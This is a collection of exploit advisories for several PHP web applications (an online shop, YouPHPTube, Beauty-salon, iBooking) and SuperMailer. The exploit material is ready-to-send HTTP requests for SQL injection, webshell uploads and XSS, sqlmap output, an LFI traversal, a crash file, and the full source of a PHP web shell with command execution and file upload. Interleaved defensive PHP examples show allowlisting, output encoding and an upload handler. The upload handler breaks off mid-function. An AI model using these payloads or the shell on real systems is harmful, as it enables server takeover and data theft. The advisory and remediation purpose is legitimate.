<pre><code># Exploit Title: Online shopping system advanced 1.0 - Multiple<br />Vulnerabilities<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2020-09-24<br /># Vendor Homepage:<br />https://github.com/PuneethReddyHC/online-shopping-system-advanced<br /># Software Link :<br />https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip<br /># Tested Version: 1.0<br /># Tested on: Windows 10 using XAMPP / Linux Ubuntu server 18.04 + Apache +<br />php 5.X/7.X + MySQL<br /><br /># Recap: SQLi = 2, RCE = 1, stored XSS = 2, reflected XSS = 2: 7<br />vulnerabilities<br /><br /># Vulnerability Type: SQL Injection - #1<br /><br />CVSS v3: 9.8<br />CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br />CWE: CWE-89<br /><br />Vulnerability description: Online shopping system advanced 1.0 allows SQL<br />injection via the admin/edit_user.php, user_id parameter.<br /><br />Proof of concept:<br /><br />Save this content in a file:<br /><br />POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)<br />Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: multipart/form-data;<br />boundary=---------------------------120411781422335<br />Content-Length: 489<br />Origin: http://127.0.0.1<br />Connection: keep-alive<br />Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25<br />Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263<br />Upgrade-Insecure-Requests: 1<br />Host: 127.0.0.1<br /><br />-----------------------------120411781422335<br />Content-Disposition: form-data; name="user_id"<br /><br />25<br />-----------------------------120411781422335<br />Content-Disposition: form-data; name="email"<br /><br />otheruser@gmail.com<br />-----------------------------120411781422335<br />Content-Disposition: form-data; name="password"<br /><br 
/>puneeth@123<br />-----------------------------120411781422335<br />Content-Disposition: form-data; name="btn_save"<br /><br /><br />-----------------------------120411781422335--<br /><br /><br />And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p user_id<br /><br />(custom) POST parameter 'MULTIPART user_id' is vulnerable. Do you want to<br />keep testing the others (if any)? [y/N]<br />sqlmap identified the following injection point(s) with a total of 115<br />HTTP(s) requests:<br />---<br />Parameter: MULTIPART user_id ((custom) POST)<br /> Type: AND/OR time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind<br /> Payload: -----------------------------120411781422335<br />Content-Disposition: form-data; name="user_id"<br /><br />25' AND SLEEP(5) AND 'HGWF'='HGWF<br />-----------------------------120411781422335<br />Content-Disposition: form-data; name="email"<br /><br />otheruser@gmail.com<br />-----------------------------120411781422335<br />Content-Disposition: form-data; name="password"<br /><br />puneeth@123<br />-----------------------------120411781422335<br />Content-Disposition: form-data; name="btn_save"<br /><br /><br />-----------------------------120411781422335--<br />---<br />[16:25:28] [INFO] the back-end DBMS is MySQL<br />web application technology: Apache 2.4.38, PHP 5.6.40<br />back-end DBMS: MySQL >= 5.0.12<br /><br /><br /># Vulnerability Type: SQL Injection - #2<br /><br />CVSS v3: 9.8<br />CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br />CWE: CWE-89<br /><br />Vulnerability description: Online shopping system advanced 1.0 allows SQL<br />injection via the action.php, proId parameter.<br /><br />Proof of concept:<br /><br />Save this content in a file:<br /><br />POST http://127.0.0.1/online/action.php HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)<br />Gecko/20100101 Firefox/70.0<br />Accept: */*<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: 
application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 49<br />Origin: http://127.0.0.1<br />Connection: keep-alive<br />Referer: http://127.0.0.1/online/<br />Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263<br />Host: 127.0.0.1<br /><br />addToCart=1&proId=70<br /><br /><br />And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p proId<br /><br />POST parameter 'proId' is vulnerable. Do you want to keep testing the<br />others (if any)? [y/N]<br />sqlmap identified the following injection point(s) with a total of 72<br />HTTP(s) requests:<br />---<br />Parameter: proId (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: addToCart=1&proId=70' AND 7704=7704 AND 'IGsd'='IGsd<br /><br /> Type: AND/OR time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind<br /> Payload: addToCart=1&proId=70' AND SLEEP(5) AND 'pAwv'='pAwv<br />---<br />[16:03:38] [INFO] the back-end DBMS is MySQL<br />web application technology: Apache 2.4.38, PHP 5.6.40<br />back-end DBMS: MySQL >= 5.0.12<br /><br /><br /># Vulnerability Type: Remote Command Execution (RCE)<br /><br />CVSS v3: 9.8<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br />CWE: CWE-434<br /><br />Vulnerability description: File Restriction Bypass vulnerabilities were<br />found in Online shopping system advanced v1.0. This allows for an<br />authenticated user to potentially obtain RCE via webshell.<br /><br />Proof of concept:<br /><br />1. Go to the add product page >> (admin/add_product.php)<br />2. Select product image and load a valid image.<br />3. Turn Burp/ZAP Intercept On<br />4. Select webshell - ex: shell.php<br />5. Alter the request in the upload...<br /> Update 'filename' to the desired extension. 
ex: shell.php<br /> It is not necessary to change the content type to 'image/png'<br /><br />Example exploitation request:<br /><br />====================================================================================================<br /><br />POST http://127.0.0.1/online/admin/add_product.php HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)<br />Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: multipart/form-data;<br />boundary=---------------------------184982084830387<br />Content-Length: 960<br />Origin: http://127.0.0.1<br />Connection: keep-alive<br />Referer: http://127.0.0.1/online/admin/add_product.php<br />Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263<br />Upgrade-Insecure-Requests: 1<br />Host: 127.0.0.1<br /><br />-----------------------------184982084830387<br />Content-Disposition: form-data; name="product_name"<br /><br />demo2<br />-----------------------------184982084830387<br />Content-Disposition: form-data; name="details"<br /><br />demo2<br />-----------------------------184982084830387<br />Content-Disposition: form-data; name="picture"; filename="shell.php"<br />Content-Type: image/gif<br /><br /><?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?><br />-----------------------------184982084830387<br />Content-Disposition: form-data; name="price"<br /><br />1<br />-----------------------------184982084830387<br />Content-Disposition: form-data; name="product_type"<br /><br />1<br />-----------------------------184982084830387<br />Content-Disposition: form-data; name="brand"<br /><br />1<br />-----------------------------184982084830387<br />Content-Disposition: form-data; name="tags"<br /><br />Summet<br />-----------------------------184982084830387<br />Content-Disposition: form-data; name="submit"<br /><br /><br />-----------------------------184982084830387--<br /><br 
/>====================================================================================================<br /><br />6. To view the webshell path go to Product List (admin/cosmetics_list.php)<br />7. Send the request and visit your new webshell<br /> Ex:<br />http://127.0.0.1/online/product_images/1600959116_shell.php?cmd=whoami<br /> nt authority\system<br /><br /># Vulnerability Type: stored Cross-Site Scripting (XSS) - #1<br /><br />CVSS v3: 6.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: Online shopping system advanced v1.0 does not<br />sufficiently encode user-controlled inputs, resulting in a stored<br />Cross-Site Scripting (XSS) vulnerability via the admin/edit_user.php, in<br />multiple parameters.<br /><br />Proof of concept:<br /><br />Stored:<br /><br />POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)<br />Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: multipart/form-data;<br />boundary=---------------------------120411781422335<br />Content-Length: 496<br />Origin: http://127.0.0.1<br />Connection: keep-alive<br />Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25<br />Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263<br />Upgrade-Insecure-Requests: 1<br />Host: 127.0.0.1<br /><br />-----------------------------120411781422335<br />Content-Disposition: form-data; name="user_id"<br /><br />25<br />-----------------------------120411781422335<br />Content-Disposition: form-data; name="email"<br /><br />otheruser@gmail.com<br />-----------------------------120411781422335<br />Content-Disposition: form-data; name="password"<br /><br /></td><script>alert(1);</script><td><br />-----------------------------120411781422335<br />Content-Disposition: form-data; name="btn_save"<br 
/><br /><br />-----------------------------120411781422335--<br /><br /><br /># Vulnerability Type: stored Cross-Site Scripting (XSS) - #2<br /><br />CVSS v3: 6.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: Online shopping system advanced v1.0 does not<br />sufficiently encode user-controlled inputs, resulting in a stored<br />Cross-Site Scripting (XSS) vulnerability via the admin/add_user.php, in<br />multiple parameters.<br /><br />Proof of concept:<br /><br />Stored:<br /><br />POST http://127.0.0.1/online/admin/add_user.php HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)<br />Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 192<br />Origin: http://127.0.0.1<br />Connection: keep-alive<br />Referer: http://127.0.0.1/online/admin/add_user.php<br />Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263<br />Upgrade-Insecure-Requests: 1<br />Host: 127.0.0.1<br /><br />first_name=demo&last_name=demo&email=demo%40localhost.inet&user_password=demo&mobile=5555555555&address1=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctd%3E&address2=here+5&btn_save=<br /><br /><br /># Vulnerability Type: reflected Cross-Site Scripting (XSS) - #1<br /><br />CVSS v3: 6.1<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: Online shopping system advanced v1.0 does not<br />sufficiently encode user-controlled inputs, resulting in a reflected<br />Cross-Site Scripting (XSS) vulnerability via the admin/clothes_list.php, in<br />the page parameter.<br /><br />Proof of concept:<br /><br />Reflected:<br /><br />http://127.0.0.1/online/admin/clothes_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E<br /><br /><br /># Vulnerability Type: reflected Cross-Site Scripting (XSS) - #2<br /><br />CVSS v3: 6.1<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: Online shopping system advanced v1.0 does not<br />sufficiently encode user-controlled inputs, resulting in a reflected<br />Cross-Site Scripting (XSS) vulnerability via the admin/cosmetics_list.php,<br />in the page parameter.<br /><br />Proof of concept:<br /><br />Reflected:<br /><br />http://127.0.0.1/online/admin/cosmetics_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E<br /><br /></code></pre>
<pre><code># Exploit Title: SuperMailer v11.20 - Buffer overflow DoS<br /># Exploit Author: Rafael Pedrero<br /># Discovery Date: 2021-02-07<br /># Vendor Homepage:<br />https://int.supermailer.de/download_newsletter_software.htm<br /># Software Link : https://int.supermailer.de/smintsw.zip /<br />https://int.supermailer.de/smintsw_x64.zip<br /># Tested Version: v11.20 32bit/64bit [11.20.0.2204]<br /># Tested on: Windows 7, 10<br /><br />CVSS v3: 3.3<br />CVSS vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L<br />CWE: CWE-20<br /><br />Vulnerability description: A vulnerability in Newsletter Software<br />SuperMailer v11.20 32bit/64bit [11.20.0.2204] could allow an attacker to<br />cause a process crash resulting in a Denial of service (DoS) condition for<br />the application on an affected system. The vulnerability exists due to<br />insufficient validation of certain elements of a malformed configuration<br />file. An attacker could exploit this vulnerability by sending a user a<br />malicious SMB (configuration file) file through a link or email attachment<br />and persuading the user to open the file with the affected software on the<br />local system. A successful exploit could allow the attacker to cause the<br />application to crash when trying to load the malicious file.<br /><br />Proof of concept:<br /><br />1.- Go to File -> Save program options...<br />2.- Save the file (default extension *.smb)<br />3.- Edit the file and insert a long run of A characters somewhere. 
Example: DoS.smb<br />file<br /><br />Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F<br /><br />00000000 10 03 00 00 00 00 00 00 A9 E5 7E 41 41 41 41 41 ........©å~AAAAA<br />00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<br />00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<br />00000030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<br />00000040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<br />00000050 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<br />00000060 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<br />00000070 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<br />00000080 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<br />00000090 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<br />000000A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<br />000000B0 41 41 97 99 E5 40 00 00 00 00 00 00 00 00 00 00 AA—™å@..........<br />000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />000000E0 00 00 00 00 00 00 6B 00 00 00 53 00 6F 00 66 00 ......k...S.o.f.<br />000000F0 74 00 77 00 61 00 72 00 65 00 5C 00 4D 00 69 00 t.w.a.r.e.\.M.i.<br />00000100 72 00 6B 00 6F 00 20 00 42 00 6F 00 65 00 65 00 r.k.o. .B.o.e.e.<br />00000110 72 00 20 00 53 00 6F 00 66 00 74 00 77 00 61 00 r. .S.o.f.t.w.a.<br />00000120 72 00 65 00 5C 00 53 00 75 00 70 00 65 00 72 00 r.e.\.S.u.p.e.r.<br />00000130 4D 00 61 00 69 00 6C 00 65 00 72 00 5C 00 54 00 M.a.i.l.e.r.\.T.<br />00000140 65 00 73 00 74 00 20 00 45 00 4D 00 61 00 69 00 e.s.t. .E.M.a.i.<br />00000150 6C 00 20 00 41 00 64 00 64 00 72 00 65 00 73 00 l. 
.A.d.d.r.e.s.<br />00000160 73 00 65 00 73 00 00 00 00 00 00 00 00 00 00 00 s.e.s...........<br /><br />And save the file.<br /><br />4.- Go to File -> Restore program options...<br />5.- The application "sm.exe" crashes.<br /><br /></code></pre>
<pre><code># Exploit Title: YouPHPTube <= 7.8 - Multiple Vulnerabilities<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2021-01-31<br /># Vendor Homepage: https://www.youphptube.com/<br /># Software Link : https://www.youphptube.com/<br /># Tested Version: 7.8<br /># Tested on: Windows 7, 10 using XAMPP<br /><br /># Vulnerability Type: LFI + Path Traversal<br /><br />CVSS v3: 7.5<br />CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N<br />CWE: CWE-829, CWE-22<br /><br />Vulnerability description: YouPHPTube v7.8 allows unauthenticated directory<br />traversal and Local File Inclusion through the parameter in a<br />/?lang=PATH+TRAVERSAL+FILE (without php) GET request because of an<br />include_once in the locale/function.php page.<br /><br />Proof of concept:<br /><br />To detect: http://localhost/youphptube/index.php?lang=)<br /><br />An error is generated:<br /><br />Warning: preg_grep(): Compilation failed: unmatched parentheses at offset 0<br />in C:\xampp\htdocs\YouPHPTube\locale\function.php on line 47<br /><br />In the function.php page, we can see:<br /><br />// filter some security here<br />if (!empty($_GET['lang'])) {<br /> $_GET['lang'] = str_replace(array("'", '"', """, "'"),<br />array('', '', '', ''), xss_esc($_GET['lang']));<br />}<br /><br />if (empty($_SESSION['language'])) {<br /> $_SESSION['language'] = $config->getLanguage();<br />}<br />if (!empty($_GET['lang'])) {<br /> $_GET['lang'] = strip_tags($_GET['lang']);<br /> $_SESSION['language'] = $_GET['lang'];<br />}<br />@include_once<br />"{$global['systemRootPath']}locale/{$_SESSION['language']}.php";<br /><br /><br />The parameter "lang" can be modified to load a php file on the server.<br /><br /><br />In Document root: /phpinfo.php with this content:<br /><br /><?php echo phpinfo(); ?><br /><br /><br />To Get phpinfo.php: http://127.0.0.1/youphptube/?lang=../../phpinfo<br /><br />Note: phpinfo without ".php".<br /><br />The new Path is:<br />@include_once "{$global['systemRootPath']}locale/../../phpinfo.php";<br /><br />And you can see the PHP information in the browser.<br /><br /><br /><br /># Vulnerability Type: reflected Cross-Site Scripting (XSS)<br /><br />CVSS v3: 6.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: YouPHPTube 7.8 and before does not sufficiently<br />encode user-controlled inputs, resulting in a reflected Cross-Site<br />Scripting (XSS) vulnerability via the<br />/<YouPHPTube_path_directory>/signup?redirectUri=<XSS>, in the redirectUri<br />parameter.<br /><br />Proof of concept:<br /><br />http://localhost/<br /><YouPHPTube_path_directory>/signup?redirectUri='"()%26%25<ScRipt>alert(1)</ScRipt><br /> <br /><br /></code></pre>
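The locale include quoted in the YouPHPTube report above, rewritten defensively as an added example (this is not YouPHPTube's code). Instead of interpolating $_SESSION['language'] into include_once, it builds an allowlist from the files that actually exist in the locale directory, checks the requested code against it, and confirms the resolved path with realpath() before anything is included. In the application the directory would be $global['systemRootPath'] . 'locale'; the script uses a constructed temporary directory so it runs on its own, and the function names are illustrative.

```php
<?php
// Added example, not YouPHPTube's code: the locale include rewritten around
// an allowlist. In the application $localeDir would be
// $global['systemRootPath'] . 'locale'; here a constructed temporary
// directory stands in so the script runs stand-alone.

/** Language codes that exist as "<code>.php" files inside $localeDir. */
function availableLanguages(string $localeDir): array
{
    $codes = [];
    foreach (glob(rtrim($localeDir, '/\\') . '/*.php') ?: [] as $path) {
        $codes[] = basename($path, '.php');
    }
    return $codes;
}

/**
 * Return $requested if it is well-formed and in $allowed, else $default.
 * The shape check admits letters, digits, '_' and '-' only, so '.', '/'
 * and '\' (the traversal characters) never pass; the strict in_array then
 * requires an exact match with a file that really exists.
 */
function selectLanguage(?string $requested, array $allowed, string $default): string
{
    if ($requested === null || $requested === '') {
        return $default;
    }
    if (!preg_match('/\A[A-Za-z0-9_-]{2,16}\z/', $requested)) {
        return $default;
    }
    return in_array($requested, $allowed, true) ? $requested : $default;
}

/**
 * Canonical path of the locale file, or null if it does not exist or
 * resolves outside $localeDir. This is a second, independent check on the
 * exact path that will be handed to include_once.
 */
function localeFile(string $localeDir, string $lang): ?string
{
    $base = realpath($localeDir);
    $file = realpath($localeDir . '/' . $lang . '.php');
    if ($base === false || $file === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($file, $prefix, strlen($prefix)) === 0 ? $file : null;
}

// Demonstration with a constructed locale directory holding two languages.
$localeDir = sys_get_temp_dir() . '/locale_demo_' . bin2hex(random_bytes(4));
mkdir($localeDir);
file_put_contents("$localeDir/en_US.php", "<?php return 'en_US';\n");
file_put_contents("$localeDir/es_ES.php", "<?php return 'es_ES';\n");
$allowed = availableLanguages($localeDir);

// A legitimate code plus the two values used in the report above.
foreach (['es_ES', '../../phpinfo', ')'] as $input) {
    $lang = selectLanguage($input, $allowed, 'en_US');
    $file = localeFile($localeDir, $lang);
    printf("%-14s -> language %s, file %s\n", $input, $lang, $file === null ? '(none)' : basename($file));
    // In the application this is where the include happens:
    // if ($file !== null) { include_once $file; }
}

array_map('unlink', glob("$localeDir/*.php") ?: []);
rmdir($localeDir);
```

The two layers are deliberately redundant: the allowlist alone already stops "../../phpinfo", but the realpath() prefix check also protects the include if a later change lets an unvalidated value reach $_SESSION['language'] by another route.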
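Added example, not code from YouPHPTube or Online shopping system advanced, covering the three output contexts that the XSS reports on this page involve: stored fields rendered into table cells (edit_user.php, add_user.php), the page parameter of the list pages, and the redirectUri value of the signup form. Function names, the table layout and the hidden-field markup are assumptions; the payload strings are the ones quoted in the reports.

```php
<?php
// Added example, not code from YouPHPTube or Online shopping system advanced:
// context-aware handling for the inputs the XSS reports on this page involve.
// Function names and the markup are illustrative.

/** Encode for HTML text and for double-quoted attribute values. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/**
 * A "page" parameter is a number. Parse it as one and echo the integer;
 * the raw string never reaches the HTML.
 */
function pageNumber(?string $raw, int $maxPage): int
{
    $n = filter_var($raw ?? '', FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => $maxPage]]);
    return $n === false ? 1 : $n;
}

/** One row of the user list: every stored field is encoded on output. */
function userRow(array $user): string
{
    return '<tr><td>' . h($user['email']) . '</td><td>' . h($user['address1']) . '</td></tr>';
}

/**
 * Accept only a same-site relative path as a redirect target: a single
 * leading '/', then URL-safe characters. Absolute URLs, '//host' forms,
 * quotes, parentheses and angle brackets all fall back to $fallback.
 */
function safeRedirect(?string $uri, string $fallback = '/'): string
{
    if ($uri === null || $uri === '') {
        return $fallback;
    }
    return preg_match('#\A/(?!/)[A-Za-z0-9_./?=&%-]*\z#', $uri) ? $uri : $fallback;
}

/** The hidden field that carries the redirect target through the signup form. */
function redirectField(?string $uri): string
{
    return '<input type="hidden" name="redirectUri" value="' . h(safeRedirect($uri)) . '">';
}

// Demonstration with the payloads quoted in the reports (constructed records).
$storedPayload   = '</td><script>alert(1);</script><td>';   // edit_user.php / add_user.php
$pagePayload     = '</h1><script>alert(1);</script><h1>';  // clothes_list.php?page=
$redirectPayload = '\'"()&%<ScRipt>alert(1)</ScRipt>';    // signup?redirectUri= (URL-decoded)

echo userRow(['email' => 'otheruser@gmail.com', 'address1' => $storedPayload]), "\n";
echo '<h1>Page ', pageNumber($pagePayload, 50), '</h1>', "\n";
echo redirectField($redirectPayload), "\n";
echo redirectField('/account/orders?page=2'), "\n";
```

The stored payload is rendered as literal text because '<', '>' and the quotes are encoded at the point of output; the page value becomes 1 because it is not an integer in range; the redirectUri value falls back to '/' because it is not a relative path, while a genuine relative path is kept and attribute-encoded.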
<pre><code>## Exploit Title: Beauty-salon v1.0 - Remote Code Execution (RCE)<br />## Exploit Author: nu11secur1ty<br />## Date: 10.12.2022<br />## Vendor: https://code4berry.com/projects/beautysalon.php<br />## Software: https://code4berry.com/project%20downloads/beautysalon_download.php<br />## Reference: https://github.com/nu11secur1ty/NVE/blob/NVE-master/2022/NVE-2022-1012.txt<br /><br />## Description:<br />The parameter `userimage` from Beauty-salon-2022 suffers from Web<br />Shell-File Upload - RCE.<br />NOTE: The user permissions of this system are not working correctly, and<br />the function is not sanitizing well.<br />The attacker can use an already created account from someone who controls<br />this system and he can upload a very malicious file by using this<br />vulnerability,<br />or more precisely (no sanitizing of function for edit image), for whatever<br />account, then he can execute it from anywhere on the external network.<br /><br />Status: HIGH Vulnerability<br /><br />[+] Exploit:<br /><br />```php<br /><!-- Project Name : PHP Web Shell --><br /><!-- Version : 4.0 nu11secur1ty --><br /><!-- First development date : 2022/10/05 --><br /><!-- This Version development date : 2022/10/05 --><br /><!-- Moded and working with PHP 8 : 2022/10/05 --><br /><!-- language : html, css, javascript, php --><br /><!-- Developer : nu11secur1ty --><br /><!-- Web site : https://www.nu11secur1ty.com/ --><br /><br /><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "<br />http://www.w3.org/TR/html4/strict.dtd"><br /><html><br /><head><br /><meta http-equiv="Content-Type" content="text/html" charset="euc-kr"><br /><title>PHP Web Shell Ver 4.0 by nu11secur1ty</title><br /><script type="text/javascript"><br />function FocusIn(obj)<br />{<br />if(obj.value == obj.defaultValue)<br />obj.value = '';<br />}<br /><br />function FocusOut(obj)<br />{<br />if(obj.value == '')<br />obj.value = obj.defaultValue;<br />}<br /></script><br /></head><br /><body><br /><b>WebShell's 
Location = http://<?php echo $_SERVER['HTTP_HOST']; echo<br />$_SERVER['REQUEST_URI'] ?></b><br><br><br /><br />HTTP_HOST = <?php echo $_SERVER['HTTP_HOST'] ?><br><br />REQUEST_URI = <?php echo $_SERVER['REQUEST_URI'] ?><br><br /><br /><br><br /><br /><form name="cmd_exec" method="post" action="http://<?php echo<br />$_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>"><br /><input type="text" name="cmd" size="70" maxlength="500" value="Input<br />command to execute" onfocus="FocusIn(document.cmd_exec.cmd)"<br />onblur="FocusOut(document.cmd_exec.cmd)"><br /><input type="submit" name="exec" value="exec"><br /></form><br /><?php<br />if(isset($_POST['exec']))<br />{<br />exec($_POST['cmd'],$result);<br /><br />echo '----------------- < OutPut > -----------------';<br />echo '<pre>';<br />foreach($result as $print)<br />{<br />$print = str_replace('<','<',$print);<br />echo $print . '<br>';<br />}<br />echo '</pre>';<br />}<br />else echo '<br>';<br />?><br /><br /><form enctype="multipart/form-data" name="file_upload" method="post"<br />action="http://<?php echo $_SERVER['HTTP_HOST']; echo<br />$_SERVER['REQUEST_URI'] ?>"><br /><input type="file" name="file"><br /><input type="submit" name="upload" value="upload"><br><br /><input type="text" name="target" size="100" value="Location where file will<br />be uploaded (include file name!)"<br />onfocus="FocusIn(document.file_upload.target)"<br />onblur="FocusOut(document.file_upload.target)"><br /></form><br /><?php<br />if(isset($_POST['upload']))<br />{<br />$check = move_uploaded_file($_FILES['file']['tmp_name'], $_POST['target']);<br /><br />if($check == TRUE)<br />echo '<pre>The file was uploaded successfully!!</pre>';<br />else<br />echo '<pre>File Upload was failed...</pre>';<br />}<br />?><br /></body><br /></html><br />```<br /><br /><br /># Proof and Exploit:<br />[href](https://streamable.com/ewdmoh)<br /><br /># m0e3:<br />[href](<br 
/>https://www.nu11secur1ty.com/2022/10/beauty-salon-2022-web-shell-file-upload.html<br />)<br /></code></pre>
<pre><code># Exploit Title: iBooking v1.0.8 - Arbitrary File Upload<br /># Exploit Author: d1z1n370/oPty<br /># Date: 01/11/2022<br /># Vendor Homepage: https://codecanyon.net/item/ibooking-laravel-booking-system/30362088<br /># Tested on: Linux<br /># Version: 1.0.8<br /><br /># Exploit Description:<br />The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.<br /><br /><br /># PoC request <br /><br />POST https://localhost/dashboard/upload-new-media HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/108.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Referer: https://localhost/dashboard/settings<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------115904534120015298741783774062<br />Content-Length: 449<br />Connection: close<br />Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c<br /><br />-----------------------------115904534120015298741783774062<br />Content-Disposition: form-data; name="_token"<br /><br />kVTpp66poSLeJVYgb1sM6F7KIzQV2hbVfQLaUEEW<br />-----------------------------115904534120015298741783774062<br />Content-Disposition: form-data; name="is_modal"<br /><br />1<br />-----------------------------115904534120015298741783774062<br />Content-Disposition: form-data; name="file"; filename="upload.php56"<br />Content-Type: image/gif<br /><br />GIF89a;<br /><?php system($_GET['a']); phpinfo(); ?><br />-----------------------------115904534120015298741783774062--<br /><br /></code></pre>
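Added example, not the upload code of Online shopping system advanced, Beauty-salon or iBooking: a handler for the kind of image upload that all three reports above describe (a webshell named shell.php with an image Content-Type, an unsanitised edit-image function, and a GIF header followed by PHP code in a file named upload.php56). The handler never lets the client's filename or Content-Type decide what is stored: it sniffs the magic bytes, decodes the image with GD and writes a fresh encoding under a random server-chosen name and extension. It assumes the fileinfo and GD extensions; the function names and the demonstration files are constructed.

```php
<?php
// Added example, not code from Online shopping system advanced, Beauty-salon
// or iBooking: an image-upload handler that decides the stored file's
// extension from the decoded image content, never from the client-supplied
// filename or Content-Type. Assumes the fileinfo and GD extensions.

const MAX_IMAGE_BYTES = 2 * 1024 * 1024;

// MIME type detected from the bytes => extension the server stores under.
const IMAGE_TYPES = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];

/**
 * Validate the uploaded temp file $tmpPath and, if it decodes as an image,
 * re-encode it into $destDir under a random name.
 * Returns ['ok' => bool, 'reason' => string, 'path' => ?string].
 */
function storeImageUpload(string $tmpPath, string $clientName, string $destDir): array
{
    $fail = fn(string $why) => ['ok' => false, 'reason' => $why, 'path' => null];

    $size = filesize($tmpPath);
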